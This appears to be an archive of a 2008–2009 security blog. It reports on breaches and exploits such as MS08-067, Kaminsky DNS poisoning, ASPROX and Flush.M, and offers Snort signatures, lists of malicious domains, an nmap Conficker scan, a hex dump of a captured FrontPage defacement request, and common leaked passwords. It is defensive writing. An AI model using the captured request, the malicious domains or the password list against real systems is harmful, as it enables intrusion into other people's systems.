content:"0955AC62-BF2E-4CBA-A2B9-A63F772D46CF"; nocase;
reference:url,csis.dk/dk/nyheder/nyheder.asp?tekstID=799
classtype:web-application-attack; sid:2009xxx; rev:0;)

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET
CURRENT_EVENTS Microsoft DirectShow ActiveX Exploit Attempt";
flow:to_client,established; content:"clsid"; nocase;
content:"0955AC62-BF2E-4CBA-A2B9-A63F772D46CF"; nocase; content:"omybro";
nocase; content:"logo.gif"; nocase;
reference:url,csis.dk/dk/nyheder/nyheder.asp?tekstID=799
classtype:web-application-attack; sid:2009xxx; rev:0;)

Kevin Mitnick's website hacked

2009-06-30T10:44:00.001-07:00

Just blogged about infamous hacker Kevin Mitnick on Fireblog today and actually got him to make a statement for my article.

Check the article

And the original story

Moral of the story, not even hackers are safe from hackers :)

Exclusive interview with StrongWebMail's $10,000 hacker

2009-06-10T05:12:00.000-07:00

If you haven't been living under a rock, you would of heard that webmail security company "StrongWebmail" issued a $10,000 hacking challenge to prove the security of their product. If any hacker could get into the CEO's email account and read the task list off his exchange calendar they would win $10,000. To make it even more exciting/rediculous he posted his username and password: CEO/Mustang85

The product works that any time an unauthorized person needs to access or change the password for an account it uses the phone system for two factor authentication with voice or txt message. Well Lance and co. wasn't challenged by any of that and relied on a simple XSS attack and some trickery to prove the prize was his.

Lance being an old friend of mine agreed to do an exclusive interview yesterday on FireBlog.com with all of the technical details and controversy.

LxLab's CEO commits suicide after software hack

2009-06-09T13:24:00.000-07:00

Very sad to find out today that the CEO and developer of the software leading to the massive hosting provider hack I blogged about yesterday was found hanging in his home this morning.
http://www.theregister.co.uk/2009/06/09/lxlabs_funder_death/

Sad that someone was driven to suicide from such an event but showed the pride and personal dedication this man had in his software.

VPS Hosting Vulnerability Leads to huge compromise

2009-06-08T14:04:00.000-07:00

Article on the register today reports VPS hosting company LXLabs full customer base hacked due to vulnerability in their HyperVM VPS management application.
http://www.theregister.co.uk/2009/06/08/webhost_attack/

The main reason this was possible is HyperVM requires giving customers (the public) access to your Hypervisor OS (through the HyperVM web application).

FireHost recognizes these risks and made the decision in the beginning to not give any access to the hypervisor, in fact it runs on a completely out of band private network!

Any remote command to the hypervisor go through private VPN through an API which is limited to only basic features like stop, start, reload and rename VM. It's highly controlled and secure unlike HyperVM which ran directly ontop of the hypervisor.

Virtualization security is going to continue to be a hot topic and Firehost Inc. leads the way by providing true advanced security while sharing knowledge and best practices on our blog and security center.

Wireless Keyboard Sniffing

2009-06-04T09:23:00.000-07:00

New Free Open Source utility for sniffing keystrokes on a wireless keyboard! If you have heard my talks on RFID before you will remember that regardless how weak the signal is the guy with the big antenna always wins!

The tool is called Keykeriki and is available here:

http://www.remote-exploit.org/Keykeriki.html

Keyboard Sniffer Keykeriki from Max Moser on Vimeo.

Wireless inSecurity (WPA Owned)

2009-05-20T06:22:00.000-07:00

So it has been no mystery that it's possible to break WPA and WPA2's Pre-Shared Key which is the default WPA security on most consumer grade access points. Because there is no direct weakness in the encryption protocol like WEP, it relied on brute force hash matching a process that can take a long time.

Wordlists considerably sped this process up making breaking WPA possible against dictionary PSK's in weeks/months as opposed to years. Why is this process so slow? WPA encrypts in multiple steps including salting the PSK hash with the SSID. So the password "dogthebountyhunter" would be SHA1 hash with the ssid or "DOG" as the salt. This adds unique randomness to make encryption breaking take longer.

Then two years ago group called "The Church of Wifi" released a set of rainbow tables (precomputed password hashes) for WPA security. The only issue is that it only covered the top 10 SSID names (default, linksys, NETGEAR, Belkin54g, etc) listed from http://Wigle.net/

So PCI DSS and an entire industry for years have been championing WPA and strong non-dictionary passwords for wireless safety, and it was generally considered secure, until now...

The biggest reasons WPA and most encryption are hard to break is that they are computationally difficult algorithms which simply take long time to guess. A standard modern processor say an Intel Core2Duo 2.5Ghz could brute-force crack WPA using methods above at around 600-700 PSK/s, well if there are a 500 million possible hashes to try it's going to take while (think lifetime).

Now graphics card developers namely Nvidia and ATI have been making super computers on a chip for a decade now, with simple, fast and highly parallel processors to make Counter Strike run smoothly as possible :) Recently something amazing happened, Nvidia released the CUDA API or programing library so the average Joe could write scripts and applications harnessing the power of their GPU for any type of computation, including encryption. The end result? WPA is broken:

Pyrit Source

Another movie

Oracle Weblogic IIS remote buffer overflow

2009-04-06T08:06:00.000-07:00

I think this new Weblogic exploit found on milw0rm is particularly nasty as Weblogic is a java web-app framework used as the backend for some very large enterprises. Both for internal and external facing web applications, many which house millions of financial records and transactions. These types of exploits scare me in that they have the potential to lead to a huge financial data compromise...

Also brings to mind some interesting attack vectors for finding targets, my girlfriend works in sales for an IT services/recruiting firm just last week she was asking me what a Weblogic administrator was and how she was trying to find some consultants to fill a new project. I immediately thought of this new vulnerability and that an attacker, instead of traditional banner scanning for Weblogic they can simply pull up Monster.com and find the next fortune 1000 company to 0wn.

http://jobsearch.monster.com/Search.aspx?brd=1&q=weblogic

Scary stuff... anyways, pop in this signature I wrote this morning for Emerging Threats into your IDS/IPS and let me know if they are knocking on your door yet...

**** Updated sig to match vulnerability not exploit code...


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET EXPLOIT Oracle WebLogic IIS connector JSESSIONID Remote Overflow Exploit"; flow:to_server,established; uricontent:".jsp?"; nocase; uricontent:"JSESSIONID="; nocase; isdataat:5132,relative; reference:cve,2008-5457; reference:url,infosec20.blogspot.com/2009/04/oracle-weblogic-iis-remote-buffer.html; reference:url,doc.emergingthreats.net/2009216; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Oracle; sid:2009216; rev:4;)

Dude, Where's my Conficker?

2009-04-03T09:27:00.000-07:00

With all the hoopla about Conficker, many of our customers are blowing up our inbox's wondering why they are not seeing Conficker related alerts on their Sentinel IPS?

Well congratulations to those customers, you have proper firewall rules in place, therefore Conficker cannot open up attacks to the MS08-067 vulnerability in Windows filesharing.

For those of you who are unsure, you have two easy possible solutions to barracade your front door from the thousands of daily Conficker attempts.

Firewall TCP port 445 inbound, or simply turn off Network Print/Filesharing on your Windows servers.

Also if you want to quickly sweep your internal network or DMZ for Conficker infections the latest version of Nmap can do the job in a snap! Just download the latest version and give this command a whirl:

nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args safe=1 [mylanaddress]

That's it!

Flush.M trojan and rising attack complexity

2009-03-18T08:52:00.000-07:00

An updated version of DNS hijacking malware 'Flush.M' is currently out in the wild, it originally popped up in December 2008. What is significant about this particular nasty is the methodology of network compromise, it's sharply more complex and creative in the way it hijacks it's prey.

Let me walk you through how it works:

Joe the Plumber clicks through a website with a malicious banner ad hosting a Flush.M laden PDF using Adobe's latest JBIG2 security flaw, once his browser auto-opens the PDF, the trojan is successfully installed on his machine.

Now the interesting part, the malware starts a rogue DHCP server advertising to the local lan with a 1 hour refresh rate. This means that if Joe is at the public library, the one 'Flush.M' infection will change the network settings on all machines of the same LAN.

Because DHCP has the capability to set the client machine's DNS servers 'Flush.M' resets all DNS resolvers to malicious external DNS hosts which then exposes the entire LAN to a giant man in the middle attack. Phishing, password stealing, more malware injection, click fraud, you name it...

So for the first time I can think of you have malware not spreading on the LAN via attacking known vulnerabilities but from using legitimate networking technologies to poison the environment and very quickly compromise an entire LAN. Nasty stuff.

If you want to know if Flush.M is on your network, here is a snapshot of it phoning home:

14:45:26.989321 IP 172.17.1.86.60307 > 55.55.55.55.53: 45585+ A?
isatap.snip.edu. (33)
0x0000: 4500 003d 040c 0000 7f11 c4b3 ac11 0156 E..=...........V
0x0010: 4056 8533 eb93 0035 0029 42f8 b211 0100 @V.3...5.)B.....
0x0020: 0001 0000 0000 0000 0669 7361 7461 7004 .........isatap.
0x0030: 6963 6970 0365 6475 0000 0100 01 snip.edu.....

Snort signature (thanks jp):

alert udp ![$SMTP_SERVERS,$DNS_SERVERS] any -> $DNS_SERVERS 53
(msg:"Flush DNS lookup isatap (Possible flush)"; content:"|06|isatap";
nocase; classtype:trojan-activity; sid:1021339; rev:1;)

Network Security Appliance testing and QA with Virtualization

2009-03-16T13:19:00.000-07:00

While working on our newest Intrusion Prevention appliance Sentinel IPS 4.0, we are always working to streamline and automate all testing. Unfortunately an inline bridged network device can be a challenge...

Here are some of the strategies that have worked in the past and some of the issues we are currently struggling with:

The old fashioned way (QA environment round 1):

What the team before I joined was using, 4 separate physical machines configured like this:

QA Attacker/Tester (loaded with stateful attack scripts) --> Router (192.168.x.x <-> 10.10.x.x) <--> Sentinel IPS (inline bridged appliance) <--> Switch <--> QA Target Host/s

This works but is in my mind too much equipment and software to maintain, not only that but power consumption is in microwave oven levels. Adding a new attacker or target platform requires loading or reloading another piece of hardware.

QA environment round 2:

Hello Vmware! I believe it was VMware Workstation for Windows 5.x or so which added a wonderful new network feature called "teaming" in which you could create virtual labs by daisy chaining VM's and virtual interfaces together allowing Vmware to handle all of the routing.

Here is how it worked (QA Team1):
Attacker VM (Gentoo) <-bridged interface0-> Sentinel IPS VM <-Nat interface1-> Target VM1 (Windows Server 2000) Target VM2 (CentOS 5.x)

So you simply assign all of the VM's to a single team and the one interface each to your network appliance so it will bridge the traffic from your Attacker/Tester VM to the Internal target VM's. With one command you can start and stop the entire team or add and modify the attacker and target OS's. Adding Backtrack LiveCD as one of the attacker's is easy, simply install their VM and add it into the team using the bridged interface.

Now to avoid confusion there are two bridges in action, one which bridges the attacker and network appliance (Sentinel IPS in my case) to your normal physical LAN. This is chosen automatically by VMware but if you are on a laptop which may switch between wireless and wired networks you will want to manually create a bridged interface for your wireless card. They make it dead simple to switch your team interfaces around when your not on wireless.

The second bridge is the network appliance itself! If it is an inline bridge device like our IPS, then it will bridge the already bridged interface to the private NAT network which VMware created automatically. The auto NAT network is usually some derivative of 192.168.1xx.x which likely won't clobber your normal LAN.

Ok... so that seems like the perfect setup and it has worked rock solid for us requiring only one Windows machine with VMware, one actual real network interface and 2+ gig's of RAM. Pretty easy to come by these days.

Why do we want a new setup? Well I had to splurge on a Macbook Pro last year and VMware fusion does not support teaming.... Seem like small potatoes but it kills me that I can't put my 4 gigs or ram to good use. Yes my drive is encrypted :)

*** Update: maybe time to try Convirt 1.0 on my Mac

Whole Foods RFID price tag security

2009-03-03T12:17:00.001-08:00

A brand new Whole Foods opened up right next to our house so I had to check it out on opening day. What a nightmare of triple parked Prius', scooters and other granola eating eco-hipsters transportation devices. I'm not an anti-hippy but my love for red meat, beer and Marlboro lights is not so popular with that crowd. Anyways throughout the dozens of free yummy samples I happened to notice new digital price tags under the food. Well they are not connected to any physical wires and looks to be powered off watch batteries, must be RFID! A little bit of googleing confirmed my theory and we are off to the races.

Potential security issues:

Price modification (Choice Ribeye steak for $2/pound)
Customer product tracking
Store pricing denial of service (eggs and toilet paper now $99, maybe too believable at whole foods)
Price change sniffers (publish sale items on rss feed, hide behind the cantaloupe)

I would like to hear your ideas, thoughts, comments on this change which will likely ripple down to other big box grocers in the future.

ASPROX Back with a vengance

2009-02-10T14:48:00.000-08:00

So the SQL Injection attacks have slowed down a bit but the botnet is still very much alive and is now back running large scale phishing and money mule scams designed to prey on jobless Americans.

Please read or watch the amazing ASPROX report by Dennis Brown @ Verisign given at Toorcon on the latest on ASPROX anatomy.

If you or your organization's website are a victim of ASPROX please see our highly popular ASPROX Toolkit with recommendations on defense and post compromise remediation.

Known currently active ASPROX domains:
dbrgf.ru
lijg.ru
bnmd.kz
nvepe.ru
mtno.ru
wmpd.ru
msngk6.ru
dft6s.kz
47mode.name
berjke.ru
81dns.ru
53refer.ru
chk06.ru
driver95.ru
errghr.ru
lang42.ru
netcfg9.ru
sitevgb.ru
vrelel.ru
30area.ru
4log-in.ru
advabnr.com

Also being reported at:
http://www.matchent.com/wpress/?q=node/432
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20090122

Forum Compromise gives insight into password security

2009-02-10T09:12:00.000-08:00

A large programing forum (PHPBB) was recently hacked and 20,000 account passwords were posted online and in plain text by the attacker. Like last years Myspace account hack the was an excellent mining tool for security researchers to analyze common passwords and average password strength.

Here are the most commonly used passwords, notice #2 matched the forum name of PHBB. Other interesting weak passwords of note as the permutations of 123456 and the always popular "letmein" and "qwerty". This list is also probably a great source for a brute force dictionary on pen-testing.

3.03% "123456"
2.13% "password"
1.45% "phpbb"
0.91% "qwerty"
0.82% "12345"
0.59% "12345678"
0.58% "letmein"
0.53% "1234"
0.50% "test"
0.43% "123"
0.36% "trustno1"
0.33% "dragon"
0.31% "abc123"
0.31% "123456789"
0.31% "111111"
0.30% "hello"
0.30% "monkey"
0.28% "master"
0.22% "killer"
0.22% "123123"

MS-SQL 0-day vulnerability remotely exploitable

2008-12-23T14:14:00.001-08:00

Microsoft just announced the MS-SQL sp_rewrite vulnerability I blogged about last Wednesday and looks like
mainstream news is just picking up and reporting on it.

The attack has just morphed into a critical remote flaw as it's reported it can now be exploited through SQL injection. This is an ASPROX type attack but much more dangerous as it allows attackers to gain full privilege to run commands on the SQL server as the administrator.

If your a Sentinel IPS customer, the previous signature and our older SQL injection signatures adequately defend from this attack so rest easy and enjoy the holidays!

Why is this considered a 0-day if we have known about it for a week? Well there is exploit code available and no patch yet from Microsoft... We call that 0-day as attackers can wreck havoc with no patch defenses available.

Internet Explorer XML 0-day and MS-SQL vulnerabilities

2008-12-17T10:25:00.000-08:00

Two new critical MS vulnerabilities released in early January the IE flaw (buffer overflow in the XML parser) is particularly nasty. This is a client side bug which can be triggered by clicking a malicious link from anywhere including emails...

This bug is rated "Extremely Critical", easiest workaround is to use Firefox for browsing until patched.

http://www.microsoft.com/technet/security/advisory/961051.mspx
http://secunia.com/advisories/33089/

The MS-SQL white has potential currently only allows privilege escalation and no remote code execution.

http://www.sec-consult.com/files/20081209_mssql-sp_replwritetovarbin_memwrite.txt

Sentinel IPS has signatures to protect against both.

Expoit Code Release for IE XML vuln:
http://www.milw0rm.com/exploits/7410
http://www.milw0rm.com/exploits/7477
http://www.milw0rm.com/exploits/7403

As always patch, patch, patch!

Google to save the world

2008-11-15T07:12:00.000-08:00

Ok not really, but most of you have noticed Google now using it's search heuristics to track outbreaks of the flu across North America. link

This could be exciting news for the health and science, but what is more exciting to me in IT security is their integration of Google Safe Browsing into Firefox 3. This to me is the single most powerful and simple security feature added to a browser since the gold padlock indicating encryption.

Here is how it works, Google does all the heavy lifting and tracks malware infections based on the site that distributes them. Once a site reaches the threshold of malware infections it is deemed unsafe browsing and added into Google's Anti-Malware database. Google released an API to quickly check the database for URL in real-time from a browser. So if you visit a site which is in the database you are redirected to a warning page letting you know this site is unsafe and gives links to detailed information on the malware and number of infections. You of course can bypass it and proceed to your site, but the average user will be effectively deterred from browsing.

Firefox 3 now comes standard with this feature.

Did I mention Google is working to cure world hunger and cancer in ten years?

Thank you Google, really.

MS08-067 Windows Server Remote Exploit Information

2008-10-27T08:06:00.000-07:00

We received a flood of requests from our customers to see if Sentinel IPS is protecting against attacks on this new vulnerability. Once we assured them we have several signatures are in place, (thanks Emerging Threats!) I figured a follow up with some information on this vulnerability would be helpful.

First the vulnerability is a remote buffer overflow in the RPC (remote procedure call) code in Windows OS. This vulnerability allows full code execution/system compromise over the wire.

Second, MS went public with information on this vulnerability around October 22nd after it found info of active exploitation in the wild.

Is public exploit code available? "You betcha", http://www.milw0rm.com/exploits/6841

Which versions of Windows are vulnerable? Microsoft Windows 2000, Windows XP, Windows Vista, Windows 2003 Server and Windows Server 2008

Is there a patch, update available? Yes, MS pushed an emergency update (out of band patch) on Friday, Oct 24th. That gives you an idea how serious this is.

Doesn't my firewall protect this? Yes, sort of... If you are denying ports 139 and 445 to the host, but you are likely vulnerable to your LAN, and if your grandma plugs directly into her DSL modem and turned off that pesky Windows firewall (uh oh).

What happens when I am compromised? There is a worm/botnet currently spreading using this vulnerability and after successful compromise, it then scans the local network for vulnerable machines. This means dirty laptops are extremely high risk to spread this worm.

What is the malware which the worm spreads? It is your standard auto-propigating trojan/malware/botnet client which is currently going by the name Gimmiv (Win32.Gimmiv.a/b worm).

What can I do? Keep an eye on your machines, run the latest AV software and make sure your firewalls and IPS are protecting ports 139/445 wherever possible. Last but not least, patch patch patch!

Godspeed.

ASPROX still alive, deryv.ru

2008-10-14T14:13:00.000-07:00

deryv.ru is the latest domain used by the ASPROX Botnet based SQL Injection attacks on insecure ASP websites.

Other current ASPROX domains include:
lang42.ru, s800qn.cn, s800qn.cn, ss11qn.cn

Grab our ASPROX toolkit for information on cleaning and defending from this threat.

To jailbreak or not to jailbreak the iPhone 3G

2008-10-07T11:03:00.000-07:00

I am blogging right now through my newly jailbroken iPhone 3g with 2.1 firmware... using some blogging application and typing on the tiny keyboard you may ask? Not today, I am infact using PDAnet a free Internet sharing app for jailbroken iPhones which allows you to connect your laptop pc (any variety) to your iPhone via ad-hoc wireless networking and then gain access to the Internet through your phones 3g or edge connection.

I can say this app alone is reason enough to jailbreak your iPhone... I mean, Starbucks coffee is expensive enough, paying for their Internet access is a slap in the face.

So what other wonderful goodies are available exclusively to a jailbroken iPhone? Well this is an Information Security blog so how could I not talk about the excellent new Stumbler Plus app. It is a full featured wardriving and wireless network auditing tool (GUI) and it is really quite sweet. Here are some features:

1. Finds hidden SSID's
2. Reverses AP MAC Addresses automatically to the Vendor name (COOL!)
3. Records Signal Strength, Encryption Type, and Long/Lat via GPS!

Only downsides I have found is there is no automatic feature to keep scanning while you drive, it requires you to repeatedly hit the scan button, also it doesn't seem to have a save or email results feature.

So those are the two killer jailbreak apps currently out for the iPhone 3g. I am sure some of you will wonder why I didn't mention nmap and metasploit, but if you have tried to use either on the buggy xterm app and tiny keyboard, it is not something to be desired. Maybe I will create a one button GUI version of metasploit that uses autopwn... hrmm my list of projects are getting out of control

Are you ready for IPv6?

2008-10-01T11:15:00.000-07:00

Vint Cerf one of the core developer's of IPv4 and now an evangelist for Google says time is running out at 32-bit IP addresses...

Article from timeonline.co.uk

So the question I pose is are you ready? To truly know, you have to ask yourself a few questions...

1. Does your ISP provide IPv6 connectivity (raw or tunneled)?

2. Most networking equipment and Operating systems support IPv6: but does your security equipment? If you use IDS/IPS, it's highly probably IPv6 is not yet supported or requires a software update to get there. This is based on the Snort the industry standard IDS gaining IPv6 support in recent 2.6+ releases.

3. Do you understand the security architecture changes required for IPv6?: Every node will have a public IP, no more NAT means privacy and security will have to be re-evaluated as every host will be addressable.

For example if Sally goes to website xyz.com from work, only the common WAN IP of the office is saved in xyz.com's access logs if using standard IPv4 NAT gateway. Under IPv6 the website would log the public IP designated specifically for Sally's computer and route directly back to her without NAT translation. So not only could an attacker potentially tie the website visit to Sally, he could also know the direct address to attack her computer.

4. DNS will become more important: while there are ways to simplify IPv6 notation so you don't have to remember a lengthy hex string, it will be more likely to heavily use DNS to address your LAN machines.

5. Dual mode IP stack: so most current Operating Systems like Vista, OSX and Linux come default running support for both IPv4 and IPv6, well think of the two like different layers as you could essentially be attacked on either IP protocol. You will have to remember this when designing your architecture for IPv6 so you do not leave a blind eye on IPv4 traffic.

LinuXploit Crew Frontpage author.dll core-project/1.0 attacks

2008-09-08T15:36:00.000-07:00

Received some reports about widespread frontpage extension attacks (old but still working). Example of a hacked site

Here is a quick snort signature I whipped up for protection/detection and associated traffic (thanks Jack Pepper for tcpdump):

alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"WEB linuXploit crew Frontpage access.dll attempt"; flow:established,to_server; content:"POST"; nocase; uricontent:"_vti_aut/"; nocase; uricontent:"author.dll"; nocase; content:"core-pro
ject"; nocase; reference:url,infosec20.blogspot.com; classtype:web-application-attack; sid:3001728; rev:2;)

The browser type is: core-project/1.0

0x0030: 0000 0000 504f 5354 202f 5f76 7469 5f62 ....POST./_vti_b
0x0040: 696e 2f5f 7674 695f 6175 742f 6175 7468 in/_vti_aut/auth
0x0050: 6f72 2e64 6c6c 2048 5454 502f 312e 310d or.dll.HTTP/1.1.
0x0060: 0a4d 494d 452d 5665 7273 696f 6e3a 2031 .MIME-Version:.1
0x0070: 2e30 0d0a 5573 6572 2d41 6765 6e74 3a20 .0..User-Agent:.
0x0080: 636f 7265 2d70 726f 6a65 6374 2f31 2e30 core-project/1.0
0x0090: 0d0a 486f 7374 3a20 7777 7777 2e61 6161 ..Host:.wwww.aaa
0x00a0: 6161 612e 6564 750d 0a41 6363 6570 743a aaa.edu..Accept:
0x00b0: 2061 7574 682f 7369 6369 6c79 0d0a 436f .auth/sicily..Co
0x00c0: 6e74 656e 742d 4c65 6e67 7468 3a20 3132 ntent-Length:.12
0x00d0: 3037 0d0a 436f 6e74 656e 742d 5479 7065 07..Content-Type
0x00e0: 3a20 6170 706c 6963 6174 696f 6e2f 782d :.application/x-
0x00f0: 7665 726d 6565 722d 7572 6c65 6e63 6f64 vermeer-urlencod
0x0100: 6564 0d0a 582d 5665 726d 6565 722d 436f ed..X-Vermeer-Co
0x0110: 6e74 656e 742d 5479 7065 3a20 6170 706c ntent-Type:.appl
0x0120: 6963 6174 696f 6e2f 782d 7665 726d 6565 ication/x-vermee
0x0130: 722d 7572 6c65 6e63 6f64 6564 0d0a 436f r-urlencoded..Co
0x0140: 6e6e 6563 7469 6f6e 3a20 636c 6f73 650d nnection:.close.
0x0150: 0a43 6163 6865 2d43 6f6e 7472 6f6c 3a20 .Cache-Control:.
0x0160: 6e6f 2d63 6163 6865 0d0a 0d0a 6d65 7468 no-cache....meth
0x0170: 6f64 3d70 7574 2b64 6f63 756d 656e 7425 od=put+document%
0x0180: 3361 3425 3265 3025 3265 3225 3265 3437 3a4%2e0%2e2%2e47
0x0190: 3135 2673 6572 7669 6365 2535 666e 616d 15&service%5fnam
0x01a0: 653d 2664 6f63 756d 656e 743d 2535 6264 e=&document=%5bd
0x01b0: 6f63 756d 656e 7425 3566 6e61 6d65 2533 ocument%5fname%3
0x01c0: 6469 2532 6568 746d 2533 626d 6574 6125 di%2ehtm%3bmeta%
0x01d0: 3566 696e 666f 2533 6425 3562 2535 6425 5finfo%3d%5b%5d%
0x01e0: 3564 2670 7574 2535 666f 7074 696f 6e3d 5d&put%5foption=
0x01f0: 6f76 6572 7772 6974 6526 636f 6d6d 656e overwrite&commen
0x0200: 743d 266b 6565 7025 3566 6368 6563 6b65 t=&keep%5fchecke
0x0210: 6425 3566 6f75 743d 6661 6c73 650a 3c68 d%5fout=false.h
0x0220: 746d 6c3e 0d0a 3c68 6561 643e 0d0a 3c74 tml..head..t
0x0230: 6974 6c65 3e6c 696e 7558 706c 6f69 745f itle linuXploit_
0x0240: 6372 6577 3c2f 7469 746c 653e 0d0a 3c6d crew /title..m
0x0250: 6574 6120 6874 7470 2d65 7175 6976 3d22 eta.http-equiv="
0x0260: 436f 6e74 656e 742d 5479 7065 2220 636f Content-Type".co
0x0270: 6e74 656e 743d 2274 6578 742f 6874 6d6c ntent="text/html
0x0280: 3b20 6368 6172 7365 743d 6973 6f2d 3838 ;.charset=iso-88
0x0290: 3539 2d31 223e 0d0a 3c2f 6865 6164 3e0d 59-1"../head.
0x02a0: 0a0d 0a3c 626f 6479 2062 6763 6f6c 6f72 ...body.bgcolor
0x02b0: 3d22 2346 4646 4646 4622 3e0d 0a3c 6469 ="#FFFFFF"..di
0x02c0: 7620 616c 6967 6e3d 2263 656e 7465 7222 v.align="center"
0x02d0: 3e0d 0a20 203c 703e 3c66 6f6e 7420 7369 ....pfont.si

RedHat Linux Compromised

2008-08-22T11:52:00.001-07:00

Last night Red Hat Inc. announced that their main distribution servers were compromised and this morning patches were released to fix apparently modified OpenSSH packages.

This is an incredibly interesting vector of attack, both releases of Red Hat Enterprise Linux v4, v5 and Fedora were modified with attackers essentially including their own key to the front door (ssh) into the operating system. If you have installed RHEL or Fedora from ftp or http sources recently you will certainly need to: "yum update"

https://www.redhat.com/archives/fedora-announce-list/2008-August/msg00012.html
https://rhn.redhat.com/errata/RHSA-2008-0855.html
http://www.redhat.com/security/data/openssh-blacklist.html

Blackhat / Defcon 2008 Security Tool Round-up

2008-08-21T15:31:00.000-07:00

Now that Blackhat and Defcon are over and most of us have recovered from the associated hang overs, it's fine time we review some of the great projects released at the events:

Karmasploit

This addition to the SVN tree of Metasploit includes the KARMA wireless hacking toolkit enabling many fake-AP hijacking and side-jacking attacks. If you thought your CEO was in danger at Starbucks before, now you really have to look out! Karmasploit makes hijacking sessions, capturing passwords and redirecting traffic mind numbing easy. In addition a universal wireless driver with injection support was added called "airbase" to allow you to complete attacks with most off the shelf wireless cards.

http://metasploit.com/dev/trac/wiki/Karmetasploit

Grendelscan

A new cross platform full featured web application penetration tool. Grendelscan is has filled the void in a free open source tool thats cross platform (Win/Linux/OSX) nice GUI and very advanced feature set including XSS, SQL Injection, HTTP fuzzing and standard misconfiguration checks powered by an updated set of Nikto signatures. With HP and many others releasing watered down applications I see Grendelscan quickly becoming THE defacto tool in web app vulnerability testing.

http://grendel-scan.com/

Beholder

An open-source wireless IDS system, with detection for injection, replay attacks, rouge AP's and hijacking attempts. Sounds like a promising tool especially for small-medium business to get a view into their wireless space and little budget for the mostly commercial WIDS systems. Yes Kismet does some of this but it was originally designed for wardriving and is not as featured as Beholder claims to be.

http://www.beholderwireless.org/

Nmap

Obviously not a new tool but Fyodor announced extensive upgrades to the newest development version of nmap at Defcon. Most interesting upgrades are the faster scanning techniques based on common ports, better OS detection and last but not least a rockin new revamed GUI version Zenmap which has a mind blowing network mapping function which auto-creates a 3D network map showing host associations and ability to pan and tilt (the demo of this feature had the crowd in an uproar of excitement). Zenmap supports OSX in addition to Windows and Linux

http://nmap.org/zenmap/

Voiper

Voiper is a toolkit for fuzzing and attacking VOIP protocols and devices. It currently only supports the SIP protocol but seems like a promising tool for penetration testing VOIP.

http://sourceforge.net/projects/voiper/

Defcon 2008 Party Round Up

2008-08-05T11:41:00.000-07:00

Compiled a list of parties going on at Defcon 16 this year so I am tracking them here to share with the security/beer lover's community.

Core Security Customer Briefing and Cocktail Party
Date: Thursday, August 7
Cocktail party: 6:30-8:30pm
Location: Sushi Roku in The Forum Shops at Caesars
Info: Requires RSVP and Pass obtained at Core booth at Blackhat

Ethical Hacker Network Party
When: Thurs evening, Aug 7, 2008 from 8:00 - 11:00pm
Where: Hofbrauhaus Las Vegas

Microsoft Party
When: Thurs night 12pm
Where: Location TBD
Info: Invite only, bring your glowsticks and they will supply alcohol and bluescreens

StillSecure Freakshow Party
When: Sat Aug 9th 9pm-1am
Where: Top of the Riviera (roof?)
Info: Free booze and prizes if you dress up like a freak?

What: theSummit EFF/THF Fund Raiser
When: Thursday Auguest 7th, 2008 9pm-12am
Where: TBD (Either the Skyboxes OR Top of the Riv)

Non corporate sponsored:

Hacker Pimps
When: Fri Aug 8th 9pm-2am
Where: Riviera Skybox 207 and 208

Spiders are Fun Party
When: Fri Aug 8th ?pm-?am
Where: Riviera Skybox 206

Email me if you know of any others which are not listed here: gregm @ econet dot com

Oh and if you were curious about the female attendance at Defcon make sure to read this wired article

ASPROX Latest Attack Vector: JS.JS

2008-08-04T12:24:00.000-07:00

Most ASPROX SQL Injection attacks are now using js.js

Grab our ASPROX toolkit for information on cleaning and defending from this threat.

Here are the latest ASPROX domains detected:

www.porv.ru/js.js
www.ncbw.ru/js.js
www.98hs.ru/js.js
www.nwj4.ru/js.js
www.bywd.ru/js.js
www.bgsr.ru/js.js
www.ibse.ru/js.js
www.uhwc.ru/js.js
www.ojns.ru/js.js
www.8hcs.ru/js.js
mo98g.cn/q.js
abc.verynx.cn/w.js
www.bosf.ru/js.js
www.bnsr.ru/js.js
www.ch35.ru/js.js
www.jve4.ru/js.js
www.nmr43.ru/js.js
www.bce8.ru/js.js
www.ncwc.ru/js.js
www.njep.ru/js.js
www.bjxt.ru/js.js
www.b4so.ru/js.js
www.kj5s.ru/js.js
www.oics.ru/js.js
www.po4c.ru/js.js
www.kjwd.ru/js.js
www.bsko.ru/js.js
www.pfd2.ru/js.js
www.iroe.ru/js.js
www.gty5.ru/js.js
www.kpo3.ru/js.js
www.ncb2.ru/js.js
www.kr92.ru/js.js

You have a new update available...

2008-07-28T17:03:00.000-07:00

On the tail of the huge DNS flaw, Argentinian group InfoByte Security Research have released a shocking new tool to exploit insecure application updates using man in the middle attack including Kaminsky's DNS poisoning.

Essentially "Evilgrade" is both an attack toolkit and mock update server framework to redirect application's update services to the host running Evilgrade. If successful full system compromise is capable giving the attacker a passive way to amass a botnet.

Evilgrade has support for exploiting the following popular program's update services:
Java, Winzip, Winamp, Mac OS X, OpenOffice, iTunes, Linkedin Toolbar

So what is the upside to such a scary tool? It will likely force developers to create new a new secure process for pushing updates, probably moving to some sort of PKI architecture.

Kaminsky DNS Cache Poisoning PoC Exploit in Metasploit SVN

2008-07-24T10:34:00.001-07:00

Looks like Druid and HDM have release a proof of concept exploit in Metasploit to attack nameserver's using Kaminsky's now leaked vulnerability. This is huge because not only is the attack unbelievably easy execute, 95% of the Internet is still vulnerable!

This is a historical moment in IT Security and will be a very, very busy day for those of us on the defense side.

Exploit Code:

http://www.caughq.org/exploits/CAU-EX-2008-0002.txt

http://www.caughq.org/exploits/CAU-EX-2008-0003.txt

Or simply grab the latest metasploit:


svn co http://metasploit.com/svn/framework3/trunk/

Snort signatures I wrote for Emerging Threats:


alert udp any 53 -> $HOME_NET any (msg:"ET CURRENT_EVENTS DNS Query Responses with 3 RR's set (50+ in 2 seconds) - possible NS RR Cache Poisoning Attempt"; content: "|85 00 00 01 00 01 00 01|"; offset: 2; within: 8; threshold: type both, track by_src,count 50, seconds 2; classtype:bad-unknown;  reference:url,infosec20.blogspot.com/2008/07/kaminsky-dns-cache-poisoning-poc.html; sid:2008447; rev:10;)

